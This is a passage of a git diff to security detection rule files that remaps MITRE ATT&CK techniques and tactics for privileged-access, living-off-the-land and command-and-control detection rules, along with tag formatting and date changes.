b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -78,30 +78,34 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = [ + "Use Case: Privileged Access Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml index 6d695a94ca5..14c6f23bdb1 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -78,30 +78,29 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = [ + "Use Case: Privileged Access Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml index 819783e4e86..abd5652b01f 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -78,30 +78,29 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = [ + "Use Case: Privileged Access Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml index 7af93c7e7f8..51b64715dc1 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -78,30 +78,34 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = [ + "Use Case: Privileged Access Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml index 419a525d378..6a80f4a7bd4 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -77,30 +77,29 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = [ + "Use Case: Privileged Access Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml index 475bbf0e183..bf61284eae9 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -80,40 +80,29 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = [ + "Use Case: Privileged Access Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml index 43ae8f19544..d287e6828b1 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -87,13 +87,19 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml index f0865772d82..581372213fe 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -89,8 +89,19 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml index d58878658ee..ece76dfc05e 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -79,35 +79,29 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = [ + "Use Case: Privileged Access Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml index bb3d1645ebc..afb390d2236 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -81,35 +81,41 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Discovery", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = [ + "Use Case: Privileged Access Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml index 4a71ea94c33..f7407fd1638 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -89,13 +89,19 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml index 4bc54d76a48..c3078e43d19 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] anomaly_threshold = 75 @@ -79,17 +79,24 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Resources: Investigation Guide"] +tags = [ + "Use Case: Privileged Access Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml index 49333d5a47a..24db21c141b 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/19" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 75 @@ -90,3 +90,16 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml index ee6dee10815..abb8bb47e03 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 75 @@ -92,3 +92,16 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml index 640761874bc..513d1a8b875 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 75 @@ -82,30 +82,26 @@ The LotL Attack Detection integration detects living-off-the-land activity in Wi - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Living off the Land Attack Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml index 3fbffb61ab0..c9d776c0b19 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -113,3 +113,21 @@ not (process.parent.name : "opera.exe" and process.command_line: "*--type=render ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.004" +name = "Masquerade Task or Service" +reference = "https://attack.mitre.org/techniques/T1036/004/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml index 45959ad908c..283a4020daf 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -117,3 +117,21 @@ The detection leverages a machine learning model to identify potentially suspici - Escalate the incident to the security operations center (SOC) or relevant security team for further analysis and to determine if additional systems are affected.""" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.004" +name = "Masquerade Task or Service" +reference = "https://attack.mitre.org/techniques/T1036/004/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml index eaeea2b1bae..22b4da6597d 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 75 @@ -91,3 +91,16 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml index c23efcce91d..7b94ae3ca14 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 75 @@ -93,3 +93,16 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml index 0d020444c91..a5b82dcbbf8 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 75 @@ -93,3 +93,16 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml index d685f0e9f35..2bbc37b2ccd 100644 --- a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml +++ b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/21" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/16" [rule] author = ["Elastic"] @@ -90,19 +90,15 @@ The AWS CLI allows users to interact with AWS services via command-line, offerin framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/linux/command_and_control_cat_network_activity.toml b/rules/linux/command_and_control_cat_network_activity.toml index ce9bc194297..cab972324d4 100644 --- a/rules/linux/command_and_control_cat_network_activity.toml +++ b/rules/linux/command_and_control_cat_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint"] maturity = "production" -updated_date = 